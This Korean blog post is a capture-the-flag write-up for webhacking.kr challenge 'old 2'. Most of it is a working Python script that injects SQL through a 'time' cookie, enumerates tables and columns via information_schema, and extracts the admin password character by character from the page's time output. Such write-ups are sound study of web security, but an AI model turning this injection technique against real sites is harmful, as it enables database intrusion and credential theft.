[ webhacking.kr ] 2번 old
sangjun
·2022. 2. 2. 13:25
반응형
문제 소스
<!--
2022-02-02 01:35:05
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
문제 풀이
- 주석에 admin.php에 들어가보라고 힌트를 준다.
- sql injection이 안 먹히는것 같으니 admin의 pw를 알아내야 하는것 같다.
- 느낌상 bsqli같다
- 입력 벡터는 PHPSESSION과 time 쿠키뿐이다.
- PHPSESSION을 바꾸게 되면 로그아웃 되니 time값에 sql injection을 넣어보겠다.
- True일 때는 1초로 되고 False일 때는 0초로 된다.
import requests
import string
from pwn import *
url="https://webhacking.kr/challenge/web-02/"
tc=string.ascii_letters+string.digits+string.punctuation
cookie={
"PHPSESSID":"vinncgg3oi5pqsp06fu33k5ppp"
}
def leak_DB_CNT():
query="(select count(table_name) from information_schema.tables where table_schema=database())"
cookie['time']=query
response=requests.get(url,cookies=cookie)
return response.text
def leak_DB_length():
query="(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)"
cookie['time']=query
response=requests.get(url,cookies=cookie)
return response.text
def leak_DB_name():
result=""
for idx in range(1,13+1):
query=f"(select ascii(substring(table_name,{idx},1)) from information_schema.tables where table_schema=database() limit 0,1)"
cookie['time']=query
response=requests.get(url, cookies=cookie)
parse=response.text[response.text.find("2070-01-01 09:")+14:response.text.find("2070-01-01 09:")+19]
repl=parse.replace(":"," ")
a=int(repl[:repl.find(" ")])*60
b=int(repl[repl.find(" ")+1:])
result+=chr(a+b)
return result
def leak_column_cnt(db_name):
query=f"(select count(column_name) from information_schema.columns where table_name='{db_name}')"
cookie['time']=query
log.critical(f"query = {query}")
response=requests.get(url,cookies=cookie)
return response.text
def leak_column_length(db_name):
query=f"(select length(column_name) from information_schema.columns where table_name='{db_name}')"
log.info(f"payload= {query}")
cookie['time']=query
response=requests.get(url,cookies=cookie)
return response.text
def leak_column_name(db_name):
result=""
for i in range(1,2+1):
query1=f"(select ascii(substring(column_name,{i},1)) from information_schema.columns where table_name='{db_name}')"
cookie['time']=query1
response=requests.get(url,cookies=cookie)
parse=response.text[response.text.find("2070-01-01 09:")+14:response.text.find("2070-01-01 09:")+19]
repl=parse.replace(":"," ")
a=int(repl[:repl.find(" ")])*60
b=int(repl[repl.find(" ")+1:])
result+=chr(a+b)
return result
def leak_pw_length():
query=f"(select length(pw) from admin_area_pw)"
log.info(f"payload= {query}")
cookie['time']=query
response=requests.get(url,cookies=cookie)
print(response.text)
def leak_pw():
result=""
for i in range(1,18):
query1=f"(select ascii(substring(pw,{i},1)) from admin_area_pw)"
cookie['time']=query1
response=requests.get(url,cookies=cookie)
parse=response.text[response.text.find("2070-01-01 09:")+14:response.text.find("2070-01-01 09:")+19]
repl=parse.replace(":"," ")
a=int(repl[:repl.find(" ")])*60
b=int(repl[repl.find(" ")+1:])
result+=chr(a+b)
return result
log.critical("[+]leak DB CNT\n"+leak_DB_CNT())
log.critical("[+]leak DB Length\n "+leak_DB_length())
db_Name=leak_DB_name()
log.critical("[+]leak DB NAME\n"+db_Name)
log.critical("[+] leak colum cnt\n"+leak_column_cnt(db_Name))
log.critical("[+] leak colum length\n"+leak_column_length(db_Name))
log.critical("[+] leak colum name\n"+leak_column_name(db_Name))
leak_pw_length()
print(leak_pw())기억해야할 점
1. 입력 벡터 찾기
2. 주석이 없다면 딕셔너리 공격한번 해보기
3. sql injection이 나왔을 때 DB이름 Table네임 어떻게 구할지 생각해보기
4. information_schema.XXX 변수 기억하기
5. 4번의 XXX가 where절로 오면 s가 빠진다.
6. database()함수 기억해두기
반응형
'War Games > webhacking.kr' 카테고리의 다른 글
| [ webhacking.kr ] 1번 old (0) | 2022.02.02 |
|---|---|
| [ webhacking.kr ] 2번 old (0) | 2022.02.02 |
| [ webhacking.kr ] 50번 old (6) | 2022.01.26 |
| [ webhacking.kr ] 51번 old (0) | 2022.01.26 |
| [ webhacking.kr ] 52번 old (0) | 2022.01.26 |
| [ webhacking.kr ] 53번 old (0) | 2022.01.26 |
0개의 댓글